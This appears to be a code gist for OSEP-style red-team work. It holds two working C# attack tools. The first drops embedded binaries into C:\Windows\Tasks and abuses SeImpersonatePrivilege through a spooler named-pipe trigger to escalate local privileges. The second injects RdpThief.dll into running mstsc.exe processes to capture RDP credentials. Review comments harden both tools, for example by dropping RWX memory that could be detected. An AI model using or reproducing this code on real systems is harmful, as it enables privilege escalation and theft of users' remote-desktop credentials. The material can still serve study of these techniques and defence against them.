Taking advantage of Assembly.GetManifestResourceStream for quick dirt hacks (embedding payload binaries as manifest resources and dropping them to disk at run time); for more details please read: https://tahadraidia.com/posts/taking-advantage-of-assembly.getmanifestresourcestream-for-quick-dirt-hacks/ #OSEP #CSHARP #DOTNET
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Collections.Generic;
using System.Text.RegularExpressions;
namespace LPEPrintBug
{
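public static class Program
{
    /// <summary>Token access right required by <see cref="PrivilegeCheck"/> (TOKEN_QUERY).</summary>
    public const uint TOKEN_QUERY = 0x00000008;

    [StructLayout(LayoutKind.Sequential)]
    public struct LUID_AND_ATTRIBUTES
    {
        public LUID Luid;
        public UInt32 Attributes;
        public const UInt32 SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001;
        public const UInt32 SE_PRIVILEGE_ENABLED = 0x00000002;
        public const UInt32 SE_PRIVILEGE_REMOVED = 0x00000004;
        public const UInt32 SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct LUID
    {
        public UInt32 LowPart;
        public Int32 HighPart;
    }

    /// <summary>Native PRIVILEGE_SET with room for exactly one LUID_AND_ATTRIBUTES entry.</summary>
    [StructLayout(LayoutKind.Sequential)]
    public struct PRIVILEGE_SET
    {
        public uint PrivilegeCount;
        public uint Control; // use PRIVILEGE_SET_ALL_NECESSARY
        public const uint PRIVILEGE_SET_ALL_NECESSARY = 1;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)]
        public LUID_AND_ATTRIBUTES[] Privilege;
    }

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid);

    [DllImport("advapi32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr GetCurrentProcess();

    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool CloseHandle(IntPtr hObject);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool PrivilegeCheck(
        IntPtr ClientToken,
        ref PRIVILEGE_SET RequiredPrivileges,
        out bool pfResult
    );

    /// <summary>
    /// Reports whether the named privilege (e.g. "SeImpersonatePrivilege") is currently enabled in
    /// the calling process's primary token, as judged by advapi32!PrivilegeCheck.
    /// </summary>
    /// <param name="Privilege">Privilege constant name understood by LookupPrivilegeValue.</param>
    /// <returns>
    /// true only when PrivilegeCheck reports the privilege as enabled; false when it is absent,
    /// present-but-disabled, or when any of the underlying API calls fails.
    /// </returns>
    public static bool IsPrivilegeEnabled(string Privilege)
    {
        // GetCurrentProcess returns a pseudo-handle that never needs closing.
        IntPtr hProcess = GetCurrentProcess();
        if (hProcess == IntPtr.Zero) return false;

        IntPtr hToken;
        if (!OpenProcessToken(hProcess, TOKEN_QUERY, out hToken)) return false;
        try
        {
            LUID luid;
            if (!LookupPrivilegeValue(null, Privilege, out luid)) return false;

            PRIVILEGE_SET privs = new PRIVILEGE_SET
            {
                PrivilegeCount = 1,
                Control = PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY,
                Privilege = new LUID_AND_ATTRIBUTES[1]
            };
            privs.Privilege[0].Luid = luid;
            privs.Privilege[0].Attributes = LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;

            bool enabled;
            if (!PrivilegeCheck(hToken, ref privs, out enabled)) return false;
            return enabled;
        }
        finally
        {
            // The token handle is a real handle (unlike the process pseudo-handle); the original
            // never closed it, leaking one handle per call and per early return.
            CloseHandle(hToken);
        }
    }

    // Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496
    /// <summary>
    /// Copies an embedded manifest resource of the executing assembly to <paramref name="fileName"/>,
    /// creating or truncating the destination. Errors are printed to stdout, never thrown.
    /// </summary>
    /// <param name="resourceName">Manifest resource name exactly as embedded (case-sensitive).</param>
    /// <param name="fileName">Destination path on disk.</param>
    public static void WriteResourceToFile(string resourceName, string fileName)
    {
        try
        {
            using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
            {
                // GetManifestResourceStream returns null (no exception) for an unknown name. The original
                // opened the FileStream first and dereferenced the null afterwards, so a missing resource
                // left a zero-byte file behind that Main's File.Exists() checks then accepted as a payload.
                if (input == null)
                {
                    Console.WriteLine("Embedded resource not found: " + resourceName);
                    return;
                }
                using (Stream output = new FileStream(fileName, FileMode.Create))
                {
                    byte[] buffer = new byte[4096];
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        output.Write(buffer, 0, read);
                    }
                }
            }
        }
        catch (Exception e) { Console.WriteLine(e.Message); }
    }

    /// <summary>
    /// Entry point. Drops the embedded SpoolSample.exe / spoof.exe / local.exe into C:\Windows\Tasks
    /// when they are not already there, starts spoof.exe (the named-pipe side) and then SpoolSample.exe.
    /// Exit code 0 means nothing to do (already administrator); 1 means a prerequisite is missing.
    /// </summary>
    public static void Main()
    {
        // Under UAC a split-token administrator that is not elevated reports false here, which is
        // the intended "not yet elevated" meaning of this check.
        WindowsIdentity identity = WindowsIdentity.GetCurrent();
        WindowsPrincipal principal = new WindowsPrincipal(identity);
        if (principal.IsInRole(WindowsBuiltInRole.Administrator))
        {
            Console.WriteLine("Already Administrator!");
            System.Environment.Exit(0);
        }

        // Held-but-disabled is not enough: IsPrivilegeEnabled requires the privilege to be enabled.
        if (!IsPrivilegeEnabled("SeImpersonatePrivilege"))
        {
            Console.WriteLine("SeImpersonatePrivilege privilege is required.");
            System.Environment.Exit(1);
        }

        // NOTE(review): C:\Windows\Tasks is a well-known, broadly writable drop location and a common
        // hunting-rule target; both the paths and the pipe name "test" below are hard-coded.
        const string spoolsample = @"C:\Windows\Tasks\SpoolSample.exe";
        const string spoof = @"C:\Windows\Tasks\spoof.exe";
        const string local = @"C:\Windows\Tasks\local.exe";
        string hostname = Dns.GetHostName();

        // Drop whatever is not already on disk. The resource name is the bare file name, so derive it
        // with Path.GetFileName instead of the original "[a-zA-Z0-9]+.exe" regex, which treated '.'
        // as a wildcard and silently skipped any name containing '_' or '-'.
        foreach (string file in new[] { spoolsample, spoof, local })
        {
            if (!File.Exists(file))
            {
                WriteResourceToFile(Path.GetFileName(file), file);
            }
        }
        // WriteResourceToFile is synchronous and disposes its FileStream, so the original 3 s
        // "give it time" sleep after the drop added nothing.

        if (!File.Exists(spoof) || !File.Exists(spoolsample))
        {
            Console.WriteLine("Required payloads are missing from disk, bail!");
            System.Environment.Exit(1);
        }

        string spoolsampleparam = String.Format("{0} {0}/pipe/test", hostname);
        Runner pipeListener = new Runner(spoof, @"\\.\pipe\test\pipe\spoolss");
        Runner trigger = new Runner(spoolsample, spoolsampleparam);

        // The listener must be running before SpoolSample connects. The original started it on a thread
        // and only launched SpoolSample if th1.ThreadState == Running, but Process.Start returns almost
        // immediately, so the thread could already be Stopped and SpoolSample was then never started.
        // Runner.Execute terminates the program itself on a failed Start, so reaching the next line
        // means spoof.exe has been launched.
        pipeListener.Execute();

        // Best-effort grace period for spoof.exe to create its named pipe before the trigger connects.
        // TODO(review): replace with a real readiness probe if the race is ever observed in practice.
        Thread.Sleep(3000);

        trigger.Execute();
    }
}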
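/// <summary>
/// Starts one external executable with a fixed argument string. A launch failure is treated as
/// fatal for the whole program (message on stdout, exit code 1).
/// </summary>
public class Runner
{
    private readonly string filename;
    private readonly string param;

    /// <param name="filename">Full path of the executable to start.</param>
    /// <param name="param">Command line passed verbatim as the process arguments.</param>
    public Runner(string filename, string param)
    {
        this.filename = filename;
        this.param = param;
    }

    /// <summary>
    /// Launches the process and returns without waiting for it to exit.
    /// Process.Start throws (Win32Exception when the file cannot be run, InvalidOperationException on a
    /// bad StartInfo) and only returns false when no new process had to be created. The original
    /// inspected just the bool, so a missing or blocked payload became an unhandled exception on a
    /// worker thread that tore the program down with a stack trace instead of the intended message.
    /// </summary>
    public void Execute()
    {
        try
        {
            using (Process pr = new Process())
            {
                pr.StartInfo = new ProcessStartInfo { FileName = filename, Arguments = param };
                if (!pr.Start())
                {
                    Bail("Something went wrong, bail!");
                }
            }
        }
        catch (System.ComponentModel.Win32Exception e)
        {
            Bail("Something went wrong, bail! " + e.Message);
        }
        catch (InvalidOperationException e)
        {
            Bail("Something went wrong, bail! " + e.Message);
        }
    }

    /// <summary>Prints <paramref name="message"/> and terminates the program with a non-zero exit code.</summary>
    private static void Bail(string message)
    {
        Console.WriteLine(message);
        System.Environment.Exit(1);
    }
}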
}
using System;
using System.IO;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace RDPThiefInjector
{
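public class Program
{
    // Minimal process rights for a write-memory + CreateRemoteThread injection. The original requested
    // PROCESS_ALL_ACCESS (0x001F0FFF), which is more than the calls below need.
    private const uint PROCESS_CREATE_THREAD = 0x0002;
    private const uint PROCESS_VM_OPERATION = 0x0008;
    private const uint PROCESS_VM_READ = 0x0010;
    private const uint PROCESS_VM_WRITE = 0x0020;
    private const uint PROCESS_QUERY_INFORMATION = 0x0400;
    private const uint INJECT_ACCESS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION;

    private const uint MEM_COMMIT_RESERVE = 0x3000; // MEM_COMMIT | MEM_RESERVE
    // The remote buffer only ever holds a path string that LoadLibraryA reads; it never executes, so
    // PAGE_READWRITE is sufficient. The original used PAGE_EXECUTE_READWRITE (0x40), an RWX allocation
    // that is a needless detection signal.
    private const uint PAGE_READWRITE = 0x04;

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
        byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool CloseHandle(IntPtr hObject);

    // Source: https://stackoverflow.com/questions/2989400/store-files-in-c-sharp-exe-file/2989496
    /// <summary>
    /// Copies an embedded manifest resource of the executing assembly to <paramref name="fileName"/>,
    /// creating or truncating the destination. Errors are printed to stdout, never thrown.
    /// </summary>
    /// <param name="resourceName">Manifest resource name exactly as embedded (case-sensitive).</param>
    /// <param name="fileName">Destination path on disk.</param>
    public static void WriteResourceToFile(string resourceName, string fileName)
    {
        try
        {
            using (Stream input = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName))
            {
                // GetManifestResourceStream returns null (no exception) for an unknown name. The original
                // opened the FileStream first and dereferenced the null afterwards, leaving a zero-byte
                // rdp.dll on disk that Main's File.Exists() check then accepted as a valid payload.
                if (input == null)
                {
                    Console.WriteLine("Embedded resource not found: " + resourceName);
                    return;
                }
                using (Stream output = new FileStream(fileName, FileMode.Create))
                {
                    byte[] buffer = new byte[4096];
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        output.Write(buffer, 0, read);
                    }
                }
            }
        }
        catch (Exception e) { Console.WriteLine(e.Message); }
    }

    /// <summary>
    /// Makes process <paramref name="pid"/> load <paramref name="dllPath"/> by writing the path into its
    /// address space and starting a remote thread at kernel32!LoadLibraryA.
    /// </summary>
    /// <returns>
    /// false, after printing the Win32 error, when any step fails — typically OpenProcess when the target
    /// runs at a higher integrity level or as another user. The original never checked OpenProcess's
    /// result and silently fed a NULL handle to the remaining calls, and it never closed the handle.
    /// </returns>
    private static bool InjectDll(int pid, string dllPath)
    {
        IntPtr hProcess = OpenProcess(INJECT_ACCESS, false, pid);
        if (hProcess == IntPtr.Zero)
        {
            Console.WriteLine("OpenProcess(" + pid + ") failed, error " + Marshal.GetLastWin32Error());
            return false;
        }
        try
        {
            // LoadLibraryA expects a NUL-terminated ANSI string. The original wrote dllName.Length bytes
            // with no terminator and relied on the fresh allocation happening to be zero-filled.
            // Encoding.Default is kept from the original; on .NET Framework it is the ANSI code page.
            byte[] path = Encoding.Default.GetBytes(dllPath + "\0");

            IntPtr remote = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)path.Length, MEM_COMMIT_RESERVE, PAGE_READWRITE);
            if (remote == IntPtr.Zero)
            {
                Console.WriteLine("VirtualAllocEx failed, error " + Marshal.GetLastWin32Error());
                return false;
            }
            // TODO(review): the remote page is never released (no VirtualFreeEx); harmless for a one-shot
            // injection but worth freeing once LoadLibrary has consumed the string.

            IntPtr written;
            if (!WriteProcessMemory(hProcess, remote, path, path.Length, out written) || written.ToInt64() != path.Length)
            {
                Console.WriteLine("WriteProcessMemory failed, error " + Marshal.GetLastWin32Error());
                return false;
            }

            // Assumes kernel32 is mapped at the same base in the target as in this process (same bitness);
            // a 32/64-bit mismatch would make this address meaningless in mstsc — confirm for the build target.
            IntPtr loadLibrary = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
            if (loadLibrary == IntPtr.Zero)
            {
                Console.WriteLine("LoadLibraryA not resolved, error " + Marshal.GetLastWin32Error());
                return false;
            }

            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLibrary, remote, 0, IntPtr.Zero);
            if (hThread == IntPtr.Zero)
            {
                Console.WriteLine("CreateRemoteThread failed, error " + Marshal.GetLastWin32Error());
                return false;
            }
            CloseHandle(hThread);
            return true;
        }
        finally
        {
            CloseHandle(hProcess);
        }
    }

    /// <summary>
    /// Entry point. Drops the embedded RdpThief.dll to C:\Windows\Tasks\rdp.dll, then polls once per
    /// second injecting it into every mstsc.exe not yet attempted, until %TMP%/data.bin exists (the file
    /// this tool waits for; presumably written by the injected DLL), at which point it exits with 0.
    /// </summary>
    public static void Main()
    {
        const String dllName = @"C:\Windows\Tasks\rdp.dll";
        String creds = String.Format("{0}/data.bin", Environment.GetEnvironmentVariable("TMP"));

        WriteResourceToFile("RdpThief.dll", dllName);
        if (!File.Exists(dllName))
        {
            Console.WriteLine("Failed to drop " + dllName);
            System.Environment.Exit(1);
        }
        Console.WriteLine("Program Strated ...");

        // One injection attempt per PID. The original re-injected every mstsc.exe on every 1 s pass,
        // spawning a fresh remote thread (and LoadLibrary reference) into the same target each time.
        var attempted = new System.Collections.Generic.HashSet<int>();
        while (true)
        {
            if (!File.Exists(dllName))
            {
                Console.WriteLine("DLL removed from disk, bail!");
                System.Environment.Exit(1);
            }

            foreach (Process proc in Process.GetProcessesByName("mstsc"))
            {
                using (proc)
                {
                    int pid = proc.Id;
                    if (!attempted.Add(pid)) continue;
                    InjectDll(pid, dllName);
                }
            }

            if (File.Exists(creds))
            {
                // The original read `if (File.Exists(creds)) Console.WriteLine(...);System.Environment.Exit(0);`
                // — the Exit was outside the if, so the program quit unconditionally after the first pass.
                Console.WriteLine("Found: " + creds);
                System.Environment.Exit(0);
            }
            Thread.Sleep(1000);
        }
    }
}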
}